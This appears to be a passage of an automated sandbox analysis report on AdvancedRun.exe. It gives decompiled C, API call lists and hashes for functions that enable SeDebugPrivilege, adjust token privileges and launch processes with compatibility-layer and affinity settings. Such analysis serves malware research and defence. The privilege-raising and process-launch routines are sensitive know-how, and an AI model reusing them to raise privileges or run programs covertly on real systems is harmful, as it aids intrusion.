0x004066f3
0x004066f6
0x004066f6
0x004066fc
0x004066fe
0x00406701
0x00406709
0x0040671b
0x0040670b
0x0040670b
0x0040670e
0x00406711
0x00406714
0x00406717
0x00406717
0x0040671d
0x0040671f
0x00406722
0x0040672a
0x0040673c
0x0040672c
0x0040672c
0x0040672f
0x00406732
0x00406735
0x00406738
0x00406738
0x0040673f
0x00406745

APIs

Part of subcall function 00404FA4: memset.MSVCRT ref: 00404FB2

??2@YAPAXI@Z.MSVCRT ref: 004066B9
??2@YAPAXI@Z.MSVCRT ref: 004066E0
??2@YAPAXI@Z.MSVCRT ref: 00406701
??2@YAPAXI@Z.MSVCRT ref: 00406722

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

0x004054ea
0x004054ec
0x004054f1
0x004054f4
0x004054f7
0x004054fa
0x004054fe
0x00405501
0x00405505
0x00405508
0x0040550b
0x0040551b
0x0040550d
0x0040550f
0x0040550f
0x00405521
0x00405527
0x0040552b
0x0040552e
0x0040553f
0x00405530
0x00405532
0x00405532
0x00405556
0x00405561
0x0040556e
0x00405571
0x00405578
0x0040557e

APIs

wcslen.MSVCRT ref: 004054EC
free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F

Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
memcpy.MSVCRT ref: 00405556

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}

0x00405adf
0x00405ae6
0x00405af5
0x00405af6
0x00405afb
0x00405b00
0x00405b0a
0x00405b18
0x00405b19
0x00405b1e
0x00405b2c
0x00405b2d
0x00405b36
0x00405b37
0x00405b3c
0x00405b4a
0x00405b4b
0x00405b54
0x00405b55
0x00405b5a
0x00405b68
0x00405b69
0x00405b72
0x00405b73
0x00405b7b
0x00000000
0x00405b7b
0x00405b80

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405B19
??2@YAPAXI@Z.MSVCRT ref: 00405B37
??2@YAPAXI@Z.MSVCRT ref: 00405B55
??2@YAPAXI@Z.MSVCRT ref: 00405B73

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AdvancedRun.exe PID: 6920 Parent PID: 2812 AdvancedRun.exeCOMMON

Executed Functions

Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}

APIs

GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

GetLastError.KERNEL32(00000000), ref: 00408FEA
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E

Strings

LookupPrivilegeValueW, xrefs: 00409005
AdjustTokenPrivileges, xrefs: 00409039

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
API String ID: 616250965-1253513912
Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68

Uniqueness

Uniqueness Score: -1.00%

Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

APIs

memset.MSVCRT ref: 00402300
memset.MSVCRT ref: 0040233E
memset.MSVCRT ref: 00402356

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

wcschr.MSVCRT ref: 00402387
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0

Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69

wcschr.MSVCRT ref: 004023B7
memset.MSVCRT ref: 004023D9
SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
wcschr.MSVCRT ref: 0040242B
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
memset.MSVCRT ref: 004024BE
memset.MSVCRT ref: 004024D1
_wtoi.MSVCRT ref: 00402519
_wtoi.MSVCRT ref: 0040252B
memset.MSVCRT ref: 00402561
memset.MSVCRT ref: 00402574
_wtoi.MSVCRT ref: 004025BC
_wtoi.MSVCRT ref: 004025CE
wcschr.MSVCRT ref: 004025F0
memset.MSVCRT ref: 0040260F
ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
_snwprintf.MSVCRT ref: 0040264C
SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888

Strings

DISABLETHEMES, xrefs: 004026DD
16BITCOLOR, xrefs: 004026BA
RunAsInvoker, xrefs: 00402677
__COMPAT_LAYER, xrefs: 00402814
256COLOR, xrefs: 004026AE
HIGHDPIAWARE, xrefs: 004026FB
640X480, xrefs: 004026CE
D, xrefs: 00402374
DISABLEDWM, xrefs: 004026EC
"%s" %s, xrefs: 0040263B

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
API String ID: 2452314994-435178042
Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}

0x00408533
0x00408533
0x00408536
0x0040853e
0x00408546
0x0040854d
0x00408559
0x00408563
0x00408569
0x00408572
0x00408583
0x0040858d
0x00408595
0x0040859e
0x004085a2
0x004085a6
0x004085aa
0x004085ae
0x004085b8
0x004085c1
0x004085c8
0x004085cd
0x004085cf
0x0040867f
0x00408688
0x0040868d
0x0040868f
0x00408730
0x00408735
0x00408737
0x0040873d
0x00408750
0x0040875d
0x00408763
0x00408770
0x00408775
0x00408779
0x0040878b
0x00408790
0x004087a2
0x004087aa
0x004087b8
0x004087be
0x004087c3
0x004087c9
0x004087d2
0x004087df
0x004087e3
0x004087e6
0x00408801
0x004087e8
0x004087f8
0x004087fe
0x00408811
0x00408816
